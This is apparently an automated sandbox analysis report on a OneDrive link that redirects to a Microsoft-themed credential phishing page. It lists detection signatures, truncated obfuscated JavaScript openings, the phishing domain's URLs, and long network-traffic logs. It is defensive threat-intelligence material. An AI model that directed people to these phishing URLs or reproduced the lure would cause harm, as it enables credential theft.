Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn

Overview

General Information

Sample URL:https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn
Analysis ID:1541149

Detection

HtmlDropper
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected Html Dropper
AI detected landing page (webpage, office document or email)
HTML page contains obfuscated javascript
Phishing site detected (based on favicon image match)
Phishing site detected (based on image similarity)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Invalid 'sign-in options' or 'sign-up' link found
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6816 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1928,i,2509791596793076584,592649922223633577,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
4.15.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98LLM: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'mohrhydrokultur.adaradocumentfolder.top' does not match the legitimate domain for Microsoft., The domain 'adaradocumentfolder.top' is unusual and not associated with Microsoft., The presence of unrelated words like 'mohrhydrokultur' and 'adaradocumentfolder' in the URL is suspicious., The use of a '.top' domain extension is uncommon for a well-known brand like Microsoft and can be a red flag for phishing. DOM: 4.15.pages.csv
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdLLM: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'mohrhydrokultur.adaradocumentfolder.top' does not match the legitimate domain for Microsoft., The URL contains unusual elements such as 'adaradocumentfolder.top', which is not associated with Microsoft., The presence of a password input field on a non-Microsoft domain is suspicious and indicative of phishing. DOM: 5.19.pages.csv
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98HTTP Parser: var a0_0x36091f=a0_0x4f90;function a0_0x4f90(_0x5c77f4,_0x5e295b){var _0x24fcb4=a0_0x1e61();re
    Source: https://mohrhydrokultur.adaradocumentfolder.top/js_/671a394a1ba96-069e1219415fe70482935df3ce64b451HTTP Parser: const a0_0x3073bc=a0_0x3920;(function(_0x286f0d,_0x4566b6){const _0x46dd23=a0_0x3920,_0x1f2b9f=_0x28
    Source: https://mohrhydrokultur.adaradocumentfolder.top/js2_/671a3964cb686-18422c97909c69491844ce8ab555f730HTTP Parser: const a0_0x2a5fe5=a0_0x46e1;(function(_0x32bc40,_0xe0232c){const _0x2b1141=a0_0x46e1,_0x5d3f16=_0x32
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&step=f253efe302d32ab264a76e0ce65be769671a397785458verify&uid=671a39778547aHTTP Parser: var a0_0x242969=a0_0x220f;(function(_0x51e62b,_0x10a54b){var _0x11f018=a0_0x220f,_0xe565a2=_0x5
    Source: https://mohrhydrokultur.adaradocumentfolder.top/js2_/671a39791f8f6-73c3fa6f5f1f491ea7041c79078cc674HTTP Parser: const a0_0x2a5fe5=a0_0x46e1;(function(_0x32bc40,_0xe0232c){const _0x2b1141=a0_0x46e1,_0x5d3f16=_0x32
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98Matcher: Template: microsoft matched with high similarity
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98Matcher: Found strong image similarity, brand: MICROSOFT
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdMatcher: Found strong image similarity, brand: MICROSOFT
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98HTTP Parser: Number of links: 0
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: Number of links: 0
    Source: https://onedrive.live.com/view.aspx?resid=3E563D3FB2A98D1C!sa5e46869611b4483bcab4817eed24b41&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_ZT1IUGpxVW4&wd=target%28Quick%20Notes.one%7C087bc1e6-1071-4924-97c8-9c06613cae25%2FMohr%20HYDROKULTUR%7Ca61e7bae-8de5-48ea-9575-302832b9824d%2F%29&wdorigin=NavigationUrlHTTP Parser: Total embedded image size: 56838
    Source: https://onedrive.live.com/personal/3e563d3fb2a98d1c/_layouts/15/Doc.aspx?sourcedoc=%7Ba5e46869-611b-4483-bcab-4817eed24b41%7D&action=default&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_ZT1IUGpxVW4&slrid=ba095da1-10b3-a000-2020-f8c86b0ebf8e&originalPath=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_cnRpbWU9QmY3LXdDVDAzRWc&CID=41ae2d81-d6a2-4d5a-bc24-bef3a325b0a4&_SRM=0:G:39HTTP Parser: Base64 decoded: {"siteid":"8c4f37b4-180c-47a5-bd62-049c455972c2","aud":"00000003-0000-0ff1-ce00-000000000000/onedrive.live.com@9188040d-6c67-4c5b-b112-36a304b66dad","exp":"1730200189"}
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98HTTP Parser: Title: a3609aa6e6c3453a45d858f7b7ee50f2671a39485d592 does not match URL
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: Title: a3609aa6e6c3453a45d858f7b7ee50f2671a39485d592 does not match URL
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: Invalid link: reset it now.
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98HTTP Parser: Invalid link: get a new Microsoft account
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98HTTP Parser: Invalid link: Terms of use
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98HTTP Parser: Invalid link: Privacy & cookies
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: Invalid link: Terms of use
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: Invalid link: Privacy & cookies
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: <input type="password" .../> found
    Source: https://onedrive.live.com/view.aspx?resid=3E563D3FB2A98D1C!sa5e46869611b4483bcab4817eed24b41&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy8zZTU2M2QzZmIyYTk4ZDFjL0VtbG81S1ViWVlORXZLdElGLTdTUzBFQllTZVQzaE9PR3V2X01iZVQtbjJ5NGc_ZT1IUGpxVW4&wd=target%28Quick%20Notes.one%7C087bc1e6-1071-4924-97c8-9c06613cae25%2FMohr%20HYDROKULTUR%7Ca61e7bae-8de5-48ea-9575-302832b9824d%2F%29&wdorigin=NavigationUrlHTTP Parser: No favicon
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: No favicon
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98HTTP Parser: No <meta name="author".. found
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: No <meta name="author".. found
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=d9e0656dd064d478791a812104e166b4c7e5a6d4main&uid=f253efe302d32ab264a76e0ce65be769671a3949b9c98HTTP Parser: No <meta name="copyright".. found
    Source: https://mohrhydrokultur.adaradocumentfolder.top/&redirect=106a29b3e748b6cd676b5dfdea5376c1sec&uid=f253efe302d32ab264a76e0ce65be769671a39630f4bdHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49981 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 1MB later: 20MB
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.17:50247 -> 1.1.1.1:53
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: global trafficDNS traffic detected: DNS query: 1drv.ms
    Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: common.online.office.com
    Source: global trafficDNS traffic detected: DNS query: onenoteonline.nel.measure.office.net
    Source: global trafficDNS traffic detected: DNS query: messaging.engagement.office.com
    Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
    Source: global trafficDNS traffic detected: DNS query: mohrhydrokultur.adaradocumentfolder.top
    Source: global trafficDNS traffic detected: DNS query: www.onenote.com
    Source: global trafficDNS traffic detected: DNS query: fa000000012.resources.office.net
    Source: global trafficDNS traffic detected: DNS query: fa000000096.resources.office.net
    Source: global trafficDNS traffic detected: DNS query: fa000000110.resources.office.net
    Source: global trafficDNS traffic detected: DNS query: fa000000111.resources.office.net
    Source: global trafficDNS traffic detected: DNS query: fa000000128.resources.office.net
    Source: global trafficDNS traffic detected: DNS query: fa000000138.resources.office.net
    Source: global trafficDNS traffic detected: DNS query: augloop.office.com
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: spoprod-a.akamaihd.net
    Source: global trafficDNS traffic detected: DNS query: westeurope-pa00.augloop.office.com
    Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50268 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50246 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
    Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50293 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 50281 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
    Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
    Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
    Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
    Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50212
    Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50229
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
    Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
    Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50223
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
    Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
    Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
